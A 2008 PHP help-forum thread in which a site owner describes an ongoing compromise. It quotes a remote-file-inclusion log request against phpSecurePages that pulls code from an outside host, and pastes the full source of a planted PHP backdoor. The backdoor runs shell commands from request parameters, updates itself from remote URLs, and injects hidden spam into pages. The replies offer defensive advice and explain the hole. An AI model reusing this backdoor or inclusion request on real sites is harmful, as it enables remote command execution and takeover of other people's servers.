ziggy1621 Posted October 16, 2008 Share Posted October 16, 2008 I've got a site that it seems an IRC bot is attacking and writing an activeX virus after the <body> tags. I've been fighting this for weeks and here is what I have.... It is shared hosting, so php.ini is not available and my htaccess is limited. Register_Globals was on, today I turned it off after some extensive reading. The hacker is running code like the following found in my logs: //phpSecurePages/secure.php?&cfgProgDir=http://rdxihx.angelfire.com/php where the host its getting the file from changes each time, so blocking IP/Domains doesn't work and I have actually deleted phpSecurePages from the site and yet this script still works. You can follow the link after cfgProgDir to read the code that it accesses, then sometimes it creates a random file with the following code <?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.htm"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { $thisname = "1.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><dd5> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // óäàëÿåì çàâåðøàþùèå õòìë òåãè $fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fp = fopen($mpt, "r"); $drs = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) { exit(); } $drs .= $fc; } fclose($fp); $fin = $fin.$begtag; $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } echo "<ok>"; } Main(); ?> Any Help Appreciated... I'm dying here Quote Link to comment Share on other sites More sharing options...
CroNiX Posted October 16, 2008 Share Posted October 16, 2008 Anytime I use $_GET variables, I always check them against a whitelist contained in an array. If its not in the array, it just outputs 'Page Error'. Example: www.mysite.com/index.php?action=help in my code, I have: $action = isset($_GET['action']) ? $_GET['action'] : ""; //.... $allowable_actions = array('help', 'delete'); if(!in_array($action, $allowable_actions)) die('Page Error'); // ... rest of code... so if action does not = 'help' or 'delete' it kills the application and prevents any tampering. There is more to do, like run $_GET superglobal through a sanitizer, but this little whitelist goes a long way. Quote Link to comment Share on other sites More sharing options...
waynew Posted October 16, 2008 Share Posted October 16, 2008 How is he getting his files onto your server? Quote Link to comment Share on other sites More sharing options...
AV1611 Posted October 16, 2008 Share Posted October 16, 2008 I hate to tell you but if he's putting a file on your server then you've been compromised. You need to reinstall from scratch. Period. You MIGHT get lucky with a rootkit but prolly he's got crap in your system. It could be something like the ls command for example been patched to recreate or whatever. You're screwed. 1. Linux or Winblow? 2. Virt domain or host domain? 3. Your server or hosted? Quote Link to comment Share on other sites More sharing options...
CroNiX Posted October 16, 2008 Share Posted October 16, 2008 By the initial posting, it appears to be XSS. The hacker is seeing if you do something like: if(isset($_GET['cfgProgDir'])) include($_GET['cfgProgDir']); which would load and execute the file located at http://rdxihx.angelfire.com/php Quote Link to comment Share on other sites More sharing options...
discomatt Posted October 16, 2008 Share Posted October 16, 2008 Wipe every file you can. Fix security hole on a local test server. Re-upload. Quote Link to comment Share on other sites More sharing options...
CroNiX Posted October 16, 2008 Share Posted October 16, 2008 Wipe every file you can. Fix security hole on a local test server. Re-upload. I wouldn't advise that unless you know for sure that the server is compromised. If he has remote inclusion turned off the hack attempt he is talking about is useless and is only showing up in logs... Quote Link to comment Share on other sites More sharing options...
discomatt Posted October 16, 2008 Share Posted October 16, 2008 I don't believe this is an XSS issue. I believe his site in compromised. No sense in giving the attacker access through their script any longer than they already have. Quote Link to comment Share on other sites More sharing options...
PFMaBiSmAd Posted October 16, 2008 Share Posted October 16, 2008 The phpSecurePages script (despite its' name) was setting up the cfgProgDir variable in the main file as the name of a file to be included in the setup.php file. Since register_globals and allow_url_fopen were on, this allowed the GET parameter on the end of the url to set cfgProgDir when setup.php was requested directly and external raw php code was included and executed on the server (almost as if a hacker had written this script to work this way.) The phpSecurePages script has since been patched to make sure this specific security hole has been closed, but too late for everyone who's site has been taken over. Since any possible code could have been included and executed, anything could have been changed that php has access to, such as other .php files could have been modified or whole files added, any available shell() command could have been executed, or any usernames/passwords stored in php files or in a database could have been read or added to... If your site is still being taken over after you have deleted the phpSecurePages script, you need to find out how it is being done. If you compare all the filenames and file contents with a good backup version and compare the contents of all databases with a good back version, you should be able to find out what has been changed. You can either remove the added/changed files or database entries or you can delete everything and restore from a good backup version. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.